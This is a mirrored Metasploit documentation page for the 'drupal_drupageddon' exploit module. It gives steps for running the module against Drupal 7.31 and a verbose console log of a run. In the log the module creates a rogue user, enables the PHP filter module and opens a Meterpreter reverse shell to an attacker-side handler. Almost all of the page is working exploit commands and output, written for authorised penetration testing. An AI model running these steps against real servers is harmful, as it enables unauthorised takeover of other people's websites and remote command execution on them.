CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/multi/http/drupal_drupageddon.md
Views: 1904

Vulnerable Application

Drupal 7.31 official download

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use exploit/multi/http/drupal_drupageddon

  4. Do: set rhost <ip>

  5. Do: run

  6. You should get a shell.

Scenarios

This is a run against a Drupal 7.31 linux box.

msf > use exploit/multi/http/drupal_drupageddon
msf exploit(drupal_drupageddon)
msf exploit(drupal_drupageddon) > set rhost 1.1.1.1
rhost => 1.1.1.1
msf exploit(drupal_drupageddon) > set verbose true
verbose => true
msf exploit(drupal_drupageddon) > exploit

[*] Started reverse TCP handler on 2.2.2.2:4444
[*] Testing page
[*] form_build_id: form-a1VaaaEaa0lUvL79wIAfdQEaaJRw8P7a1aWGXElI_Go
[*] form_token:
[*] password hash: $P\$8zAAApjTciVA2qz7HdAA0UjAAwUft00
[*] Creating new user AaCaUlLaPR:AAgeAAAAjA
[*] Logging in as AaCaUlLaPR:AAgeAAAAjA
[*] cookie: SESS911797186fac11111d08b1111a15db55=aaSfinhC0AAAAbzhAoO3bBaaOerRrvpn3cL0rA77Dhg;
[*] Trying to parse enabled modules
[*] form_build_id: form-YZljDkG8n5AAaAaAaaaYGLaP8MIfdif5VfwjQMMxdN0
[*] form_token: Bj92oAaAaWRwqyAAAySWQpeUI03aA9wfkAozXsk_t_E
[*] Enabling the PHP filter module
[*] Setting permissions for PHP filter module
[*] form_build_id: form-1Z1pAg11amM-1jHALgm1AAAAA1JdwAAA1qXnSTZahPA
[*] form_token: kAA1A1AfqK_PvJQi1AAAAAAAAxyGyLvHemBor1q11Z1
[*] admin role id: 3
[*] Getting tokens from create new article page
[*] form_build_id: form-_-leQaaaAAeBXbAaAAaaAAx1IrYSI1qeA2OGf2Ce1vs
[*] form_token: Ib1y8aAaaAAAdapA53kUcfWf7msTRHiDUb_CIKzAAAA
[*] Calling preview page. Exploit should trigger...
[*] Sending stage (33721 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:45388) at 2016-08-25 11:30:41 -0400

meterpreter > sysinfo
Computer : drupal
OS : Linux drupal 2.6.32-642.3.1.el6.x86_64 #1 SMP Sun Jun 26 18:16:44 EDT 2016 x86_64
Meterpreter : php/linux

meterpreter > getuid
Server username: apache (48)